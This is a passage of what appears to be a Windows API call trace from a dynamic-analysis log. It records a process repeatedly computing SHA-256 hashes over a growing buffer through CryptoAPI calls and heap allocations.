	[0191.129] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.129] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.130] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.130] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0191.130] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263c80
	[0191.130] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263c80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263c80, pdwDataLen=0x1283b0) returned 1
	[0191.130] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.130] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.130] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.130] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.130] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0191.130] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263ca8
	[0191.130] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263ca8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263ca8, pdwDataLen=0x1283b0) returned 1
	[0191.130] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.131] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.131] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.131] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.131] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0191.131] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263cd0
	[0191.131] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263cd0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263cd0, pdwDataLen=0x1283b0) returned 1
	[0191.131] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.131] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.131] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.132] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.132] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0191.132] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263cf8
	[0191.132] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263cf8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263cf8, pdwDataLen=0x1283b0) returned 1
	[0191.132] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.132] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.132] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.132] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.132] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0191.132] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.132] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263d20
	[0191.132] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263d20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263d20, pdwDataLen=0x1283b0) returned 1
	[0191.132] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.132] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.132] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.133] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.133] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0191.133] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263d48
	[0191.133] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263d48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263d48, pdwDataLen=0x1283b0) returned 1
	[0191.133] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.133] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.133] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.133] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.133] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0191.133] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.133] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263d70
	[0191.133] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263d70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263d70, pdwDataLen=0x1283b0) returned 1
	[0191.133] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.133] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.133] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.134] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.134] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0191.134] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263d98
	[0191.134] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263d98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263d98, pdwDataLen=0x1283b0) returned 1
	[0191.134] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.134] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.134] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.134] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.134] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0191.134] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.134] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263dc0
	[0191.134] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263dc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263dc0, pdwDataLen=0x1283b0) returned 1
	[0191.134] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.134] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.134] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.135] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.135] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0191.135] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263de8
	[0191.135] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263de8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263de8, pdwDataLen=0x1283b0) returned 1
	[0191.135] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.135] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.135] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.135] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.135] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0191.135] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263e10
	[0191.135] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263e10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263e10, pdwDataLen=0x1283b0) returned 1
	[0191.135] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.135] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.135] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.136] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.136] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0191.136] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263e38
	[0191.136] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263e38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263e38, pdwDataLen=0x1283b0) returned 1
	[0191.136] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.136] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.136] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.136] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.136] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0191.136] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263e60
	[0191.137] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263e60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263e60, pdwDataLen=0x1283b0) returned 1
	[0191.137] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.137] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.137] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.137] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.137] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0191.137] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263e88
	[0191.137] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263e88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263e88, pdwDataLen=0x1283b0) returned 1
	[0191.137] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.137] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.137] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.138] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.138] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0191.138] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263eb0
	[0191.138] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263eb0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263eb0, pdwDataLen=0x1283b0) returned 1
	[0191.138] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.138] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.138] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.138] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.138] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0191.138] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.138] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263ed8
	[0191.138] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263ed8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263ed8, pdwDataLen=0x1283b0) returned 1
	[0191.138] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.138] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.138] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.139] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.139] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0191.139] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263f00
	[0191.139] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263f00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263f00, pdwDataLen=0x1283b0) returned 1
	[0191.139] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.139] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.139] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.139] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.139] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0191.139] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.139] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263f28
	[0191.139] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263f28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263f28, pdwDataLen=0x1283b0) returned 1
	[0191.139] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.139] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.139] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.140] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.140] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0191.140] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263f50
	[0191.140] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263f50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263f50, pdwDataLen=0x1283b0) returned 1
	[0191.140] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.140] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.140] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.140] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.140] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0191.140] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263f78
	[0191.140] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263f78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263f78, pdwDataLen=0x1283b0) returned 1
	[0191.140] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.141] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.141] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.141] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.141] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0191.141] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.141] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263fa0
	[0191.141] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263fa0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263fa0, pdwDataLen=0x1283b0) returned 1
	[0191.141] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.141] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.141] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.142] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.142] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0191.142] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263fc8
	[0191.142] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x263fc8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263fc8, pdwDataLen=0x1283b0) returned 1
	[0191.142] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.142] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.142] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.142] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.142] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0191.142] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x263ff0
	[0191.142] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x263ff0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x263ff0, pdwDataLen=0x1283b0) returned 1
	[0191.142] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.142] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.142] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.143] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.143] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0191.143] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264018
	[0191.143] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264018, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264018, pdwDataLen=0x1283b0) returned 1
	[0191.143] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.143] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.143] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.143] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.143] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0191.143] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.143] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264040
	[0191.143] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264040, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264040, pdwDataLen=0x1283b0) returned 1
	[0191.143] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.143] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.143] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.144] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
